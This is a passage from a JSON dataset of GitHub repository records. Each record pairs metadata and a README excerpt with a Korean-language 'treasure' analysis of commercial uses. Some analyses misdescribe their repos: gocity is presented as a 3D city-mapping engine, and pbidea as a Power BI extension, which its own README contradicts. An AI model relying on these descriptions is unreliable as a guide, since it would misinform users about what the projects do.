예쁜 움직이는 그래픽을 쉽게 만들 수 있는 도구로, 앱 개발자들이 복잡한 애니메이션 작업 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 SaaS 플랫폼**\n초보 개발자도 드래그-드롭으로 애니메이션을 추가할 수 있는 웹 기반 앱","readme_excerpt":"# Lottie React Native\n\n[![npm Version](https://img.shields.io/npm/v/lottie-react-native.svg)](https://www.npmjs.com/package/lottie-react-native) [![License](https://img.shields.io/npm/l/lottie-react-native.svg)](https://www.npmjs.com/package/lottie-react-native)\n\nLottie component for React Native ([iOS](https://github.com/airbnb/lottie-ios), [Android](https://github.com/airbnb/lottie-android), and [Windows](https://github.com/CommunityToolkit/Lottie-Windows))\n\nLottie is an ecosystem of libraries for parsing [Adobe After Effects](http://www.adobe.com/products/aftereffects.html) animations exported as JSON with [bodymovin](https://github.com/bodymovin/bodymovin) and rendering them natively!\n\nFor the first time, designers can create **and ship** beautiful animations without an engineer painstakingly recreating it by hand.\n\n## Installing\n\n## Breaking Changes in v6!\n\nWe've made some significant updates in version 6 that may impact your current setup. To get all the details about these chang","composite_score":0.2738,"license_safety_tag":"safe"},{"name":"baidu/mobile-deep-learning","github_url":"https://github.com/baidu/mobile-deep-learning","stars":6,"language":"C++","license":"Apache-2.0","abandonment_months":1,"description":"# baidu/mobile-deep-learning 분석 보고서\n\n## 왜 보물인가\n스마트폰에서 인공지능을 빠르고 가볍게 실행할 수 있는 기술로, 배달앱·카메라·번역 같은 일상 서비스를 더 똑똑하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 카메라로 물건을 인식하는 이커머스 검색 기능 제공\n2. **내부 업무 도구","readme_excerpt":"#  Paddle Lite\n\n[English](README_en.md) | 简体中文\n\n  [![Documentation Status](https://img.shields.io/badge/中文文档-最新-brightgreen.svg)](https://www.paddlepaddle.org.cn/lite)  [![Release](https://img.shields.io/github/release/PaddlePaddle/Paddle-Lite.svg)](https://github.com/PaddlePaddle/Paddle-Lite/releases)  [![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](LICENSE) \n\nPaddle Lite 是一个高性能、轻量级、灵活性强且易于扩展的深度学习推理框架，定位于支持包括移动端、嵌入式以及边缘端在内的多种硬件平台。\n\n当前 Paddle Lite 不仅在百度内部业务中得到全面应用，也成功支持了众多外部用户和企业的生产任务。\n\n## 快速入门\n\n使用 Paddle Lite，只需几个简单的步骤，就可以把模型部署到多种终端设备中，运行高性能的推理任务，使用流程如下所示：\n\n**一. 准备模型**\n\nPaddle Lite 框架直接支持模型结构为 [PaddlePaddle](https://github.com/PaddlePaddle/Paddle) 深度学习框架产出的模型格式。目前 PaddlePaddle 用于推理的模型是通过 [save_inference_model](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/api/paddle/static/save_inference_model_cn.html#save-inference-model) 这个 API 保存下来的。\n如果您手中的模型是由诸如 Caffe、Tensorflow、PyTorch 等框架产出的，那么您可以使用 [X2Paddle](https://github.com/PaddlePaddle/X2Paddle) 工具将模型","composite_score":0.2738,"license_safety_tag":"safe"},{"name":"hyperoslo/Lightbox","github_url":"https://github.com/hyperoslo/Lightbox","stars":95,"language":"Swift","license":"NOASSERTION","abandonment_months":21,"description":"# Lightbox (hyperoslo) 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 사진을 크고 예쁘게 띄워주는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n사진 편집 앱이나 갤러리 관리 플랫폼에 내장하여 사용자가 이미지를 멋지게 볼 수 있게 제공합니다.\n\n**2. 내부 업무 도구**\n부동산 중개 ","readme_excerpt":"# Lightbox\n\n[![CI Status](https://circleci.com/gh/hyperoslo/Lightbox.png)](https://circleci.com/gh/hyperoslo/Lightbox)\n[![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](https://img.shields.io/cocoapods/l/Lightbox.svg?style=flat)](http://cocoadocs.org/docsets/Lightbox)\n[![Platform](https://img.shields.io/cocoapods/p/Lightbox.svg?style=flat)](http://cocoadocs.org/docsets/Lightbox)\n![Swift](https://img.shields.io/badge/%20in-swift%204.0-orange.svg)\n\n<img src=\"https://raw.githubusercontent.com/hyperoslo/Lightbox/master/Images/Icon.png\" alt=\"Lightbox Icon\" align=\"right\" />\n\n**Lightbox** is a convenient and easy to use image viewer for your iOS app,\npacked with all the features you expect:\n\n- [x] Paginated image slideshow.\n- [x] Video support.\n- [x] Double-tap to zoom.\n- [x] Image caption.\n- [x] Dynamic background based on [Hue](https://github.com/hyperoslo/Hue)\n- [x] Remote image loading and cac","composite_score":0.2737,"license_safety_tag":"unknown"},{"name":"rodrigo-brito/gocity","github_url":"https://github.com/rodrigo-brito/gocity","stars":10,"language":"Go","license":"MIT","abandonment_months":6,"description":"# gocity 분석 보고서\n\n## 왜 보물인가\n도시의 건물과 거리를 3D 입체 지도로 시각화해주는 기술로, 부동산·도시계획·게임 등 다양한 산업에서 즉시 활용 가능한 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **도시 탐색 SaaS**: 부동산 중개소나 여행사가 구독료를 받고 고객에게 3D 도시 지도 서비스 제공\n2. **건설사 내부 도구**: 건","readme_excerpt":"<img width=\"350\" src=\"https://raw.githubusercontent.com/rodrigo-brito/gocity/master/pkg/server/assets/logo.png\" alt=\"GoCity\" />\n\n[![Actions Status](https://github.com/rodrigo-brito/gocity/workflows/tests/badge.svg)](https://github.com/rodrigo-brito/gocity/actions)\n[![codecov](https://codecov.io/gh/rodrigo-brito/gocity/branch/master/graph/badge.svg)](https://codecov.io/gh/rodrigo-brito/gocity)\n[![Go Report Card](https://goreportcard.com/badge/github.com/rodrigo-brito/gocity)](https://goreportcard.com/report/github.com/rodrigo-brito/gocity)\n[![GoDoc](https://godoc.org/github.com/rodrigo-brito/gocity?status.svg)](https://godoc.org/github.com/rodrigo-brito/gocity)\n<a href=\"https://opensource.org/licenses/MIT\">\n  <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"License MIT\">\n</a>\n<hr />\n \nAvailable here: https://go-city.github.io\n\nResearch Paper: [26th International Conference on Software Analysis, Evolution and Reengineering (SANER)](https://ieeexplore.ieee.org/document/86","composite_score":0.2731,"license_safety_tag":"safe"},{"name":"ElPsyCongree/LuaProfiler","github_url":"https://github.com/ElPsyCongree/LuaProfiler","stars":7,"language":"C#","license":"Apache-2.0","abandonment_months":5,"description":"# LuaProfiler 평가 분석\n\n## 왜 보물인가\n게임이나 프로그램이 느려질 때 어느 부분이 문제인지 찾아주는 진단 도구로, 개발자의 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발사의 SaaS 서비스**: 게임 제작자들이 구독하여 자신의 게임 성능을 실시간으로 분석하고 최적화하는 웹 기반 서비스\n2. **게임 엔진 회사의","readme_excerpt":"## Lua Profiler For Unity\n\n![](doc~/logo.png)\n\n### 支持情况\n| 系统                  | 支持情况|\n| ----------------------- | ------------ |\n| `windows`| ✔  |\n| `android`| ✔  |\n| `MAC`| ✔  |\n| `IOS`| 支持中  |\n\n![](doc~/use.gif)\n\n### 部署和安装\n1. 推荐安装Unity2019可以直接用PackageManager 用add by git路径添加,国内网络不好可以使用gitee代理\n![](doc~/package_clone.png)\n>https://github.com/leinlin/Miku-LuaProfiler.git\n\n2. Unity5.6以上版本建议把代码clone下来，然后把LuaProfiler目录copy到Assets中\n\n3. 看到这个菜单说明安装成功了\n![](doc~/install_success.png)\n\n### 如何使用\n- 编辑器使用推荐使用local模式，打开Profiler窗口运行游戏即可，去掉了deeplua这个开关\n![](doc~/2022-12-14-21-50-20.png)\n\n- 真机目前只支持android系统，打包的时候加上宏 `USE_LUA_PROFILER`\n- 打包后，在Unity的Application.persistentDataPath 目录下面建立 文件 need_hook_miku_lua，使用后会自动删除这个文件，第二次如果需要luaprofiler请重新创建\n \n\n可以参考下面的指令\n```\nadb shell\ncd /sdcard/Android/data/{package_name}/files\ntouch need_hook_miku_lua\n```\n\n编辑器中点击local mode 按钮就可以切换remote mode,输入手机ip就可以查看数据了\n\n![](doc~/2022-12-14-22-04-21.png)\n如果公司网络不允许你直接访问手机ip，那么可以用USB数据线连接手机和电脑输入以下指令\n```\nadb forward tcp:2333 tcp:2333\n`","composite_score":0.2731,"license_safety_tag":"safe"},{"name":"Andrettin/Wyrmsun","github_url":"https://github.com/Andrettin/Wyrmsun","stars":5,"language":"Lua","license":"gpl-2.0","abandonment_months":13,"description":"# Wyrmsun 저장소 분석\n\n## 왜 보물인가\n누구나 즐길 수 있는 전략 시뮬레이션 게임을 직접 만들고 수정할 수 있는 오픈소스 게임 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 스튜디오 내부 도구**: 인디 게임 개발사가 이 엔진을 기반으로 자체 게임을 제작하고 판매\n2. **게임 교육 플랫폼**: 게임 개발 학원이나 온라인 강의에서 학생들이","readme_excerpt":"############################################################\n############################################################\n# Wyrmsun\n############################################################\n############################################################\n\nby Andrettin\n\n\n\n\n\n############################################################\n# Introduction\n############################################################\n\nWyrmsun is an open-source RTS game which features elements of mythology, history and fiction.\n\nIn the Wyrmsun universe a myriad of inhabited planets exist. Humans dwell on Earth, while dwarves inhabit Nidavellir and elves nourish the world of Alfheim. These peoples struggle to carve a place for themselves with their tools of stone, bronze and iron. And perhaps one day they will meet one another, beyond the stars...\n\nFeatures:\n- Retro-style graphics\n- 3 playable civilizations, and a number of non-playable ones\n- Scenarios playable on a huge map\n- Dozens of units, buildings and techno","composite_score":0.2728,"license_safety_tag":"restricted"},{"name":"wassname/viz_torch_optim","github_url":"https://github.com/wassname/viz_torch_optim","stars":12,"language":"Jupyter Notebook","license":"unknown","abandonment_months":22,"description":"# wassname/viz_torch_optim 분석\n\n## 왜 보물인가\n인공지능 모델 학습 과정을 시각적으로 보여주는 도구로, 복잡한 학습 과정을 이해하기 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 교육 플랫폼 SaaS**: 대학이나 온라인 강좌에서 학생들이 모델 학습 과정을 직관적으로 이해할 수 있는 시각화 기능 제공\n\n2. **기업","readme_excerpt":"This project generates animations of pytorch optimizers solving toy problems. Examples Below.\n\n[Some nice animations](http://www.denizyuret.com/2015/03/alec-radfords-animations-for.html) were posted a few years ago by Alex Radford but didn't include the Adam optimizer or landscapes with noise.  [Louis Tiao](http://louistiao.me/notes/visualizing-and-animating-optimization-algorithms-with-matplotlib/) blogged about how to make the visualizations. The [pytorch unit tests](https://github.com/pytorch/pytorch/blob/master/test/test_optim.py) show how to run the optimizers on test functions. I pulled these together and shared the result at https://github.com/wassname/viz_torch_optim.\n\n# Examples\n\nPlease note that each optimizer has a differen't learning rate, so they are not directly comparable. This is because simpler optimizers perform better on low dimensional problems and are often given a smaller learning rate. With the same learning rate, the simpler SGD optimizer races to the finish whi","composite_score":0.2728,"license_safety_tag":"unknown"},{"name":"Microsoft/sqlopsstudio","github_url":"https://github.com/Microsoft/sqlopsstudio","stars":30,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# Microsoft/sqlopsstudio 보물 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 데이터베이스 관리 도구로, 기업들이 업무에 필수적으로 사용하는 데이터 관리 작업을 더 쉽고 빠르게 할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 데이터 분석 플랫폼으로 제공하여 월간 구독료 수익화\n2. **내부 업무 도구","readme_excerpt":"# Azure Data Studio\n\n> [!IMPORTANT]\n> Azure Data Studio [is retired](https://learn.microsoft.com/en-us/lifecycle/definitions#retirement) as of **February 28, 2026**. You should migrate to [Visual Studio Code](https://code.visualstudio.com/) and the [MSSQL extension](https://learn.microsoft.com/en-us/sql/tools/visual-studio-code-extensions/mssql/mssql-extension-visual-studio-code). For more information, see [What's happening with Azure Data Studio](https://learn.microsoft.com/en-us/sql/tools/whats-happening-azure-data-studio).\n\n----\n\n[![Join the chat at https://gitter.im/Microsoft/sqlopsstudio](https://badges.gitter.im/Microsoft/sqlopsstudio.svg)](https://gitter.im/Microsoft/sqlopsstudio?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://dev.azure.com/ms/azuredatastudio/_apis/build/status/AzureDataStudio-Localization-CI?branchName=main)](https://dev.azure.com/ms/azuredatastudio/_build/latest?definitionId=453&branchName=main)\n[![Twitter Fo","composite_score":0.2727,"license_safety_tag":"safe"},{"name":"lxb320124/pbidea","github_url":"https://github.com/lxb320124/pbidea","stars":16,"language":"PowerBuilder","license":"unknown","abandonment_months":14,"description":"# pbidea 저장소 분석\n\n## 왜 보물인가\nPower BI(마이크로소프트 데이터 분석 도구)를 더 쉽고 효율적으로 사용할 수 있게 돕는 아이디어/확장 프로젝트로, 기업의 데이터 분석 업무를 간소화할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Power BI 사용자를 위한 템플릿/플러그인 구독 서비스로 월간 요금 모델","readme_excerpt":"Before starting, it is recommended to take a moment to read this instruction\n\n    This library is specially developed for PowerBuilder applications. After testing, it is applicable to PB versions 8 – 2019.\n1、JSON\n    The user-friendly json for PB is seamlessly connected with datawindow/datasore. It can dynamically create dw/ds to import data, or match and import existing dw/ds by column.\nReal time import and export of json is fast and efficient.\nuo_ There are mainly four json function functions, namely:\n1. Parse: Convert string to JSON object\n2. ToString: convert JSON object to string\n3. Set: set JSON object or array value\n4. Get: Get JSON object or array value\nIn the case of multi-level nesting, concatenated strings can be used to directly take values. for example    \n[\n    {\n    \"__rowid__\":1,\n    \"id\":1.0,\n    \"sj\":\"2020-02-17\",\n    \"sub\":\n        [\n        {\"__rowid__\":1,\"id\":1.0,\"mch\":\"菜1\",\"dj\":9.0,\"je\":7.0},\n        {\"__rowid__\":2,\"id\":1.0,\"mch\":\"菜2\",\"dj\":1.0,\"je\":3.0},\n        {","composite_score":0.2727,"license_safety_tag":"unknown"},{"name":"endymecy/awesome-deeplearning-resources","github_url":"https://github.com/endymecy/awesome-deeplearning-resources","stars":7,"language":"","license":"MIT","abandonment_months":4,"description":"# awesome-deeplearning-resources 분석\n\n## 왜 보물인가\n인공지능 공부에 필요한 학습 자료들을 한곳에 모아놓은 가이드북으로, 초보자가 헤맬 필요 없이 체계적으로 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 학생 및 직업 전환자를 위한 구조화된 학습 경로 제공 서비스\n2. **기업 교육 솔루션**:","readme_excerpt":"# Awesome Deep learning papers and other resources\n\n![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)\n\nA list of recent papers regarding deep learning and deep reinforcement learning. They are sorted by time to see the recent papers first.\nI will renew the recent papers and add notes to these papers.\n\nYou should find the papers and software with star flag are more important or popular.\n\n## Table of Contents\n\n- [Papers](#papers)\n- [Model Zoo](#model-zoo)\n- [Pretrained Model](#pre-trained-model)\n- [Courses](#courses)\n- [Books](#books)\n- [Tutorials](#tutorials)\n- [Software](#software)\n- [Applications](#applications)\n- [Awesome Projects](#awesome-projects)\n- [Corpus](#corpus)\n\n# Papers\n- [2021 year](papers/2021/cv.md)\n    - [computer vision](papers/2021/cv.md)\n    - [natural language process](papers/2021/nlp.md) \n    - [multi model](papers/2021/mm.md)\n- [2020 year](papers/2020/dl.md)\n    - [deep learning](papers/2020/dl.md)\n   ","composite_score":0.2723,"license_safety_tag":"safe"},{"name":"raydium-io/raydium-cp-swap","github_url":"https://github.com/raydium-io/raydium-cp-swap","stars":241,"language":"Rust","license":"Apache-2.0","abandonment_months":5,"description":"","readme_excerpt":"","composite_score":0.2723,"license_safety_tag":"safe"},{"name":"sveltejs/rollup-plugin-svelte","github_url":"https://github.com/sveltejs/rollup-plugin-svelte","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":6,"description":"# rollup-plugin-svelte 분석 보고서\n\n## 왜 보물인가\n웹사이트를 빠르게 만드는 개발자들이 필수로 사용하는 도구로, Svelte라는 인기 있는 웹 프레임워크와 롤업 번들러를 연결해주는 핵심 브릿지 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 기반 SaaS 서비스**: Svelte로 만든 대시보드, 협업 도구, 프로젝트 관리 시","readme_excerpt":"> Undecided yet what bundler to use? We suggest using [SvelteKit](https://kit.svelte.dev) or Vite with [vite-plugin-svelte](https://github.com/sveltejs/vite-plugin-svelte/).\n\n# rollup-plugin-svelte [![CI](https://github.com/sveltejs/rollup-plugin-svelte/workflows/CI/badge.svg)](https://github.com/sveltejs/rollup-plugin-svelte/actions)\n\nCompile Svelte components.\n\n\n## Installation\n\n```bash\nnpm install --save-dev svelte rollup-plugin-svelte\n```\n\nNote that we need to install Svelte as well as the plugin, as it's a 'peer dependency'.\n\n\n## Usage\n\n```js\n// rollup.config.js\nimport svelte from 'rollup-plugin-svelte';\nimport resolve from '@rollup/plugin-node-resolve';\n\nexport default {\n  input: 'src/main.js',\n  output: {\n    file: 'public/bundle.js',\n    format: 'iife'\n  },\n  plugins: [\n    svelte({\n      // By default, all \".svelte\" files are compiled\n      extensions: ['.my-custom-extension'],\n\n      // You can restrict which files are compiled\n      // using `include` and `exclude`\n      inc","composite_score":0.272,"license_safety_tag":"safe"},{"name":"mishoo/UglifyJS2","github_url":"https://github.com/mishoo/UglifyJS2","stars":10,"language":"JavaScript","license":"NOASSERTION","abandonment_months":18,"description":"# UglifyJS2 분석 보고서\n\n## 왜 보물인가\n웹사이트를 더 빠르게 로딩하도록 만드는 핵심 도구로, 전 세계 수많은 웹 서비스들이 의존하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 플랫폼 SaaS**: 클라우드 기반 웹사이트 빌더나 코드 에디터 서비스에 내장하여 사용자가 자동으로 웹사이트 성능을 최적화하도록 제공\n2. **내부 업무 ","readme_excerpt":"UglifyJS 3\n==========\n\nUglifyJS is a JavaScript parser, minifier, compressor and beautifier toolkit.\n\n#### Note:\n- `uglify-js` supports JavaScript and most language features in ECMAScript.\n- For more exotic parts of ECMAScript, process your source file with transpilers\n  like [Babel](https://babeljs.io/) before passing onto `uglify-js`.\n- `uglify-js@3` has a simplified [API](#api-reference) and [CLI](#command-line-usage)\n  that is not backwards compatible with [`uglify-js@2`](https://github.com/mishoo/UglifyJS/tree/v2.x).\n\nInstall\n-------\n\nFirst make sure you have installed the latest version of [node.js](http://nodejs.org/)\n(You may need to restart your computer after this step).\n\nFrom NPM for use as a command line app:\n\n    npm install uglify-js -g\n\nFrom NPM for programmatic use:\n\n    npm install uglify-js\n\n# Command line usage\n\n    uglifyjs [input files] [options]\n\nUglifyJS can take multiple input files.  It's recommended that you pass the\ninput files first, then pass the options.  ","composite_score":0.2719,"license_safety_tag":"unknown"},{"name":"baidu/bigflow","github_url":"https://github.com/baidu/bigflow","stars":29,"language":"C++","license":"Apache-2.0","abandonment_months":6,"description":"# Baidu BigFlow 분석 리포트\n\n## 왜 보물인가\n대규모 데이터를 빠르게 처리해야 하는 기업들이 필요로 하는 **데이터 처리 엔진**으로, 복잡한 데이터 분석을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 데이터 분석 플랫폼**\n- 고객사의 방대한 판매 데이터, 고객 행동 데이터를 실시간으로 분석해주는 웹 서비스\n\n**2","readme_excerpt":"# Bigflow\n\n### Bigflow 是什么?\n\n**Baidu Bigflow** (以下简称 Bigflow)是百度的一套计算框架， 它致力于提供一套简单易用的接口来描述用户的计算任务，并使同一套代码可以运行在不同的执行引擎之上。\n\n它的设计中有许多思想借鉴自 [Google FlumeJava](http://pages.cs.wisc.edu/~akella/CS838/F12/838-CloudPapers/FlumeJava.pdf)以及 [Google Cloud Dataflow](https://github.com/GoogleCloudPlatform/DataflowJavaSDK/)，另有部分接口设计借鉴自 [Apache Spark](http://spark.apache.org/)。\n\n用户基本可以不去关心 Bigflow 的计算真正运行在哪里，可以像写一个单机的程序一样写出自己的逻辑， Bigflow 会将这些计算分发到相应的执行引擎之上执行。\n\nBigflow 的目标是: 使分布式程序写起来更简单，测起来更方便，跑起来更高效，维护起来更容易，迁移起来成本更小。\n\n目前 Bigflow 在百度公司内部对接了公司内部的批量计算引擎 DCE（与社区 Tez 比较类似），迭代引擎 Spark，以及公司内部的流式计算引擎 Gemini。\n\n在开源版本中，目前仅开放了Bigflow on Spark。\n\n### 为什么要使用 Bigflow?\n\n* **高性能**\n  Bigflow 的接口设计使得 Bigflow 可以感知更多的用户需求的细节属性，并且 Bigflow 会根据计算的属性进行作业的优化；另其执行层使用 C++ 实现，用户的一些代码逻辑会被翻译为 C++ 执行，有较大的性能提升。\n 在公司内部的实际业务测试来看，其性能远高于用户手写的作业。根据一些从现有业务改写过来的作业平均来看，其性能都比原用户代码提升了 100%+。开源版本的 benchmark 正在准备中。\n\n* **简单易用**\n  Bigflow 的接口表面看起来很像 Spark，但实际实用之后会发现 Bigflow 使用一些独特的设计使得 Bigflow 的代码更像是单机程序，例如，屏蔽了 partitioner 的概念，支持嵌套的分布式数据集等，使得其接口","composite_score":0.2718,"license_safety_tag":"safe"},{"name":"istarkov/google-map-react","github_url":"https://github.com/istarkov/google-map-react","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":3,"description":"# google-map-react 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에 구글 지도를 쉽게 추가할 수 있는 도구로, 배달앱·부동산·관광정보 등 위치 기반 서비스가 필요한 모든 비즈니스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **배달 앱 SaaS**: 식당 위치 표시, 배송 경로 추적 기능을 제공하는 배달앱 개발 플랫폼\n2. **부동산 중개","readme_excerpt":"# Google Map React &middot; [![npm version](https://badge.fury.io/js/google-map-react.svg)](http://badge.fury.io/js/google-map-react) [![Build Status](https://travis-ci.org/google-map-react/google-map-react.svg?branch=master)](https://travis-ci.org/google-map-react/google-map-react) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](github.com/google-map-react/google-map-react/CONTRIBUTING.md)\n\n`google-map-react` is a component written over a small set of the [Google Maps API](https://developers.google.com/maps/). It allows you to render any React component on the Google Map. It is fully isomorphic and can render on a server. Additionally, it can render map components in the browser even if the Google Maps API is not loaded. It uses an internal, tweakable hover algorithm - every object on the map can be hovered.\n\nIt allows you to create interfaces like this [example](http://google-map-react.github.io/google-map-react/map/main) *(You can scroll the table, zoom/mo","composite_score":0.2713,"license_safety_tag":"safe"},{"name":"Andarist/use-constant","github_url":"https://github.com/Andarist/use-constant","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":13,"description":"# use-constant 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션이 반복되는 작업을 자동으로 처리하도록 도와주는 작은 도구로, 개발자들의 손수고를 줄여준다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 관리 플랫폼에서 반복되는 설정값을 자동 처리하는 기능으로 제공\n2. **내부 업무 도구**: 기업의 웹 기반 관리 시스템에서 공","readme_excerpt":"# use-constant\n\nReact hook for creating a value exactly once. `useMemo` doesn't give this guarantee unfortunately - https://reactjs.org/docs/hooks-faq.html#how-to-create-expensive-objects-lazily\n\n### Usage\nInstall the package\n```bash\nnpm install use-constant\n# OR\nyarn add use-constant\n```\n\nIn your code\n```javascript\nimport useConstant from 'use-constant';\n\nconst MyComponent = () => {\n  // Give useConstant() a function which should be be executed exactly once and\n  // return in it your constant value\n  const myConstantValue = useConstant(() => 42);\n  // ...\n```\n","composite_score":0.271,"license_safety_tag":"safe"},{"name":"fossasia/star-me","github_url":"https://github.com/fossasia/star-me","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":4,"description":"# star-me 프로젝트 분석\n\n## 왜 보물인가\n깃허브에서 인기 있는 프로젝트를 자동으로 찾아주고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 사용자가 관심사별로 인기 프로젝트를 구독하고 추천받는 SaaS 서비스\n2. **기업 개발팀 협업 도구**: 회사 내부에서 유용한 오픈소스 프로젝트를 체계적으로 모니","readme_excerpt":"# Star Me\n\nStarring is fun and following open source projects even more so.\n\nStar Me is a small browser based script that helps developers quickly connect with FOSSASIA projects on GitHub.\nBy running the script in your browser console while logged into GitHub, you can automatically star repositories and stay up to date with project activity.\n\nThis tool is primarily intended for onboarding, workshops, and community engagement. No GitHub token or API access is required.\n\n## What does this script do\n\n* Automatically stars FOSSASIA repositories on GitHub\n* Runs entirely in your browser while you are logged in\n* Does not require any installation, extensions, or authentication tokens\n* Helps you discover projects and receive updates more easily\n\n## Requirements\n\n• A GitHub account\n• You must be signed in to GitHub\n• A modern browser such as Chrome or Chromium\n• JavaScript enabled\n\n## Steps\n\n## 1. Sign in to GitHub\n\nMake sure you are logged in to your GitHub account before proceeding.\n\n## 2. ","composite_score":0.2708,"license_safety_tag":"safe"},{"name":"deep-gaurav/warden-worker-new","github_url":"https://github.com/deep-gaurav/warden-worker-new","stars":75,"language":"Rust","license":"MIT","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.2706,"license_safety_tag":"safe"},{"name":"amusi/CVPR2021-Papers-with-Code","github_url":"https://github.com/amusi/CVPR2021-Papers-with-Code","stars":11,"language":"","license":"unknown","abandonment_months":3,"description":"# CVPR2021-Papers-with-Code 분석\n\n## 왜 보물인가\n2021년 컴퓨터 비전 분야의 최신 연구 논문들을 실제 동작하는 코드와 함께 모아둔 학습 및 참고 자료로, 인공지능 기술 개발자들에게 매우 유용한 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 컴퓨터 비전을 배우는 학생과 개발자를 위한 온라인 강의 콘텐츠 ","readme_excerpt":"# CVPR 2026 论文和开源项目合集(Papers with Code)\n\nCVPR 2026 decisions are now available on OpenReview！25.42% = 4090 / 16092\n\n\n> 注1：欢迎各位大佬提交issue，分享CVPR 2026论文和开源项目！\n>\n> 注2：关于往年CV顶会论文以及其他优质CV论文和大盘点，详见： https://github.com/amusi/daily-paper-computer-vision\n>\n> - [ICCV 2025](https://github.com/amusi/ICCV2025-Papers-with-Code)\n> - [ECCV 2024](https://github.com/amusi/ECCV2024-Papers-with-Code)\n\n\n欢迎扫码加入【CVer学术交流群】，可以获取CVPR 2026等最前沿工作！这是最大的计算机视觉AI知识星球！每日更新，第一时间分享最新最前沿的计算机视觉、AIGC、扩散模型、多模态、深度学习、自动驾驶、医疗影像和遥感等方向的学习资料，快加入学起来！\n\n![](CVer学术交流群.png)\n\n# 【CVPR 2026 论文开源目录】\n\n- [3DGS(Gaussian Splatting)](#3DGS)\n- [Agent)](#Agent)\n- [Avatars](#Avatars)\n- [Backbone](#Backbone)\n- [CLIP](#CLIP)\n- [Mamba](#Mamba)\n- [Embodied AI](#Embodied-AI)\n- [GAN](#GAN)\n- [GNN](#GNN)\n- [多模态大语言模型(MLLM)](#MLLM)\n- [大语言模型(LLM)](#LLM)\n- [具身智能(Embodied AI)](#Embodied)\n- [空间智能(Spatial Intelligence](#SI)\n- [NAS](#NAS)\n- [OCR](#OCR)\n- [NeRF](#NeRF)\n- [DETR](#DETR)\n- [扩散模型(Diffusion Models)](#Diffusion)\n- [ReID(重识别)](#ReID)\n- [长尾分布(Long-Tail)","composite_score":0.2705,"license_safety_tag":"unknown"},{"name":"jquery-validation/jquery-validation","github_url":"https://github.com/jquery-validation/jquery-validation","stars":9,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# jquery-validation 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 입력한 정보가 올바른지 자동으로 검사해주는 도구로, 전 세계 수백만 개 사이트에서 이미 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **회원가입/로그인 SaaS**: 이메일, 비밀번호 형식을 자동 검증하는 가입 페이지 서비스\n2. **전자상거래 내부 도구**: ","readme_excerpt":"[jQuery Validation Plugin](https://jqueryvalidation.org/) - Form validation made easy\n================================\n\n[![release](https://img.shields.io/github/release/jquery-validation/jquery-validation.svg)](https://github.com/jquery-validation/jquery-validation/releases/latest)\n[![Build Status](https://github.com/jquery-validation/jquery-validation/actions/workflows/ci.yml/badge.svg)](https://github.com/jquery-validation/jquery-validation/actions/workflows/ci.yml)\n[![devDependency Status](https://david-dm.org/jquery-validation/jquery-validation/dev-status.svg?theme=shields.io)](https://david-dm.org/jquery-validation/jquery-validation#info=devDependencies)\n[![jsDelivr Hits](https://data.jsdelivr.com/v1/package/npm/jquery-validation/badge?style=rounded)](https://www.jsdelivr.com/package/npm/jquery-validation)\n\nThe jQuery Validation Plugin provides drop-in validation for your existing forms, while making all kinds of customizations to fit your application really easy.\n\n## Getting Sta","composite_score":0.2703,"license_safety_tag":"safe"},{"name":"Snowflake-Labs/getting-started-with-dbt-on-snowflake","github_url":"https://github.com/Snowflake-Labs/getting-started-with-dbt-on-snowflake","stars":64,"language":"Python","license":"Apache-2.0","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.2701,"license_safety_tag":"safe"},{"name":"mfitzp/15-minute-apps","github_url":"https://github.com/mfitzp/15-minute-apps","stars":5,"language":"Python","license":"MIT","abandonment_months":2,"description":"# mfitzp/15-minute-apps 분석\n\n## 왜 보물인가\n누구나 따라 할 수 있는 간단한 앱 만드는 방법들을 모아놓은 교과서로, 프로그래밍을 배우고 싶은 초보자들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 입문자를 위한 